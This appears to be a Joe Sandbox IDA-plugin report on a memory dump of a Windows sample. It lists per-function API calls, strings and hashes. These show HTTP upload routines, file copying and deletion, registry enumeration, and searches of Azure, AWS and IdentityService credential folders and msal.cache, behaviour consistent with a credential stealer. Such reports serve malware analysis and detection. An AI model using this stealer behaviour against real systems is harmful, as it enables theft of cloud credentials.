------, xrefs: 0040568B
------, xrefs: 00405407
", xrefs: 00405614
------, xrefs: 004052E7
", xrefs: 004054D2
------, xrefs: 00405549

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$??2@AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 811081172-2774362122
Opcode ID: 2e27f85ceb7af2b283bd7e0928c40db223ec12361d2dc24050cbcd561a0c9187
Instruction ID: 1d52745d65e853cf4120aa405e943018ad764f54ae2154c0ea3196726ecd4ecf
Opcode Fuzzy Hash: 2e27f85ceb7af2b283bd7e0928c40db223ec12361d2dc24050cbcd561a0c9187
Instruction Fuzzy Hash: 8E325071921118ABCB14EBA1DC55FEEB338BF54314F40419EF50662192EF782B98CF6A

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,026DADC0), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,026DAEA0,00000000,?,026B8958,00000000,?,004219C0), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,026DAEF0,?,026DA3D8,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

", xrefs: 00405D25
", xrefs: 00405E66
XA, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
------, xrefs: 00405D9C
XA, xrefs: 004060CA
------, xrefs: 00405AE6
------, xrefs: 00405C5B

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$??2@AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$XA$XA
API String ID: 1710586764-2501203334
Opcode ID: 73a67a5719e851bcd4cf469a3b56e89187d013521b1eb7c867fa85027046c3f9
Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
Opcode Fuzzy Hash: 73a67a5719e851bcd4cf469a3b56e89187d013521b1eb7c867fa85027046c3f9
Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69

Function 0040A6C0 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A9F2
RtlAllocateHeap.NTDLL(00000000), ref: 0040A9F9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A7DA

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,026B6470,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrcat.KERNEL32(?,00000000), ref: 0040AB3A
lstrcat.KERNEL32(?,004212C4), ref: 0040AB49
lstrcat.KERNEL32(?,00000000), ref: 0040AB5C
lstrcat.KERNEL32(?,004212C8), ref: 0040AB6B
lstrcat.KERNEL32(?,00000000), ref: 0040AB7E
lstrcat.KERNEL32(?,004212CC), ref: 0040AB8D
lstrcat.KERNEL32(?,00000000), ref: 0040ABA0
lstrcat.KERNEL32(?,004212D0), ref: 0040ABAF
lstrcat.KERNEL32(?,00000000), ref: 0040ABC2
lstrcat.KERNEL32(?,004212D4), ref: 0040ABD1
lstrcat.KERNEL32(?,00000000), ref: 0040ABE4
lstrcat.KERNEL32(?,004212D8), ref: 0040ABF3

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrcat.KERNEL32(?,00000000), ref: 0040AC3C
lstrcat.KERNEL32(?,004212DC), ref: 0040AC56
lstrlenA.KERNEL32(?), ref: 0040AC95
lstrlenA.KERNEL32(?), ref: 0040ACA4
memset.MSVCRT ref: 0040ACF3

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

DeleteFileA.KERNEL32(00000000), ref: 0040AD1F

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: d5b539f8cb582158d8ab611c513f584559753324dc9cfe79fbb80cb785429f6a
Instruction ID: db3bf564d8a269597709baab17c241dc92c2864a2a44399f5d1cb95b81495e87
Opcode Fuzzy Hash: d5b539f8cb582158d8ab611c513f584559753324dc9cfe79fbb80cb785429f6a
Instruction Fuzzy Hash: 13029371901108ABCB14EBA1DC96EEE7339BF54314F10416EF507B20A1DF786E99CB6A

Function 0040CD30 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,026B8CB8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CDC3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040CF07
RtlAllocateHeap.NTDLL(00000000), ref: 0040CF0E
lstrcat.KERNEL32(?,00000000), ref: 0040D048
lstrcat.KERNEL32(?,0042141C), ref: 0040D057
lstrcat.KERNEL32(?,00000000), ref: 0040D06A
lstrcat.KERNEL32(?,00421420), ref: 0040D079
lstrcat.KERNEL32(?,00000000), ref: 0040D08C
lstrcat.KERNEL32(?,00421424), ref: 0040D09B
lstrcat.KERNEL32(?,00000000), ref: 0040D0AE
lstrcat.KERNEL32(?,00421428), ref: 0040D0BD
lstrcat.KERNEL32(?,00000000), ref: 0040D0D0
lstrcat.KERNEL32(?,0042142C), ref: 0040D0DF
lstrcat.KERNEL32(?,00000000), ref: 0040D0F2
lstrcat.KERNEL32(?,00421430), ref: 0040D101
lstrcat.KERNEL32(?,00000000), ref: 0040D114
lstrcat.KERNEL32(?,00421434), ref: 0040D123

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,026B6470,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

lstrlenA.KERNEL32(?), ref: 0040D16A
lstrlenA.KERNEL32(?), ref: 0040D179
memset.MSVCRT ref: 0040D1C8

Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F

DeleteFileA.KERNEL32(00000000), ref: 0040D1F4

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: defed34c7047e8eebab2c4c1e2daa388a3509d5f75447d41344e90146930cb71
Instruction ID: ed6c437cbd46477d92e2fdf931dfcacd4144c719bc88927133304dc8b30d11c2
Opcode Fuzzy Hash: defed34c7047e8eebab2c4c1e2daa388a3509d5f75447d41344e90146930cb71
Instruction Fuzzy Hash: 25E1A271901108ABCB14EBA0DC9AEEE7339AF54314F50415EF507B30A1DF786E99CB6A

Function 00414850 Relevance: 30.1, APIs: 10, Strings: 10, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00414867

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414890
lstrcat.KERNEL32(?,\.azure\), ref: 004148AD

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

memset.MSVCRT ref: 004148F3
lstrcat.KERNEL32(?,00000000), ref: 0041491C
lstrcat.KERNEL32(?,\.aws\), ref: 00414939

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

memset.MSVCRT ref: 0041497F
lstrcat.KERNEL32(?,00000000), ref: 004149A8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 004149C5

Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
Part of subcall function 004143F0: lstrcat.KERNEL32(?,026BBF28), ref: 0041452A
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611

memset.MSVCRT ref: 00414A0B

Strings

\.azure\, xrefs: 004148A1
*.*, xrefs: 004148B8
msal.cache, xrefs: 004149D0
\.aws\, xrefs: 0041492D
*.*, xrefs: 00414944
\.IdentityService\, xrefs: 004149B9
Z\A, xrefs: 004148D1, 0041495D, 004149E9, 00414A14, 004148D4, 00414960, 004149EC
Azure\.azure, xrefs: 004148B3
Azure\.aws, xrefs: 0041493F
Azure\.IdentityService, xrefs: 004149CB

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-156850865
Opcode ID: feaf32fe5e0005e80deb5eb27391e339a5ee684120a0f08ff2884fcc7a8d2f57
Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
Opcode Fuzzy Hash: feaf32fe5e0005e80deb5eb27391e339a5ee684120a0f08ff2884fcc7a8d2f57
Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,026DADC0), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DC3,00000000,?,?,00000000,?,",00000000,?,026DAF30), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,026DAEF0,?,026DA3D8,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

", xrefs: 00404C42
------, xrefs: 00404A0D
------, xrefs: 00404B78
------, xrefs: 00404CB9
", xrefs: 00404D83

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$??2@ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 594634378-2180234286
Opcode ID: f8d9e8e4cb377327dfc888e971e2e4a93cecea7cb31330c4bc50c05eb8206236
Instruction ID: 96828d9d4da3c69e3e13a7d192eb2c0d5cb14303612463eff3b0a86b38ab5adb
Opcode Fuzzy Hash: f8d9e8e4cb377327dfc888e971e2e4a93cecea7cb31330c4bc50c05eb8206236
Instruction Fuzzy Hash: 7B124E71912118AACB14EB91DC96FEEB339AF14314F50419EF50662091EF782F98CF6A

Function 00417DC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

RegOpenKeyExA.KERNEL32(00000000,026BC788,00000000,00020019,00000000,004205A6), ref: 00417E44
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
wsprintfA.USER32 ref: 00417EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

%s\%s, xrefs: 00417EED
- , xrefs: 00418043
?, xrefs: 00417E1A

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 938a6fd916a36c742d321860f8926f01ee6ac984dc8b335ab4e49d1500c9281f
Instruction ID: 7e933c005afce5063b6ac28d37290dd0de40035e7daa9b78ce1efab2f7c43410
Opcode Fuzzy Hash: 938a6fd916a36c742d321860f8926f01ee6ac984dc8b335ab4e49d1500c9281f
Instruction Fuzzy Hash: 3581197191111CABDB28DB54CC85FEAB7B9BF08314F0082D9E10AA6190DF756BC9CFA5

Function 004062D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

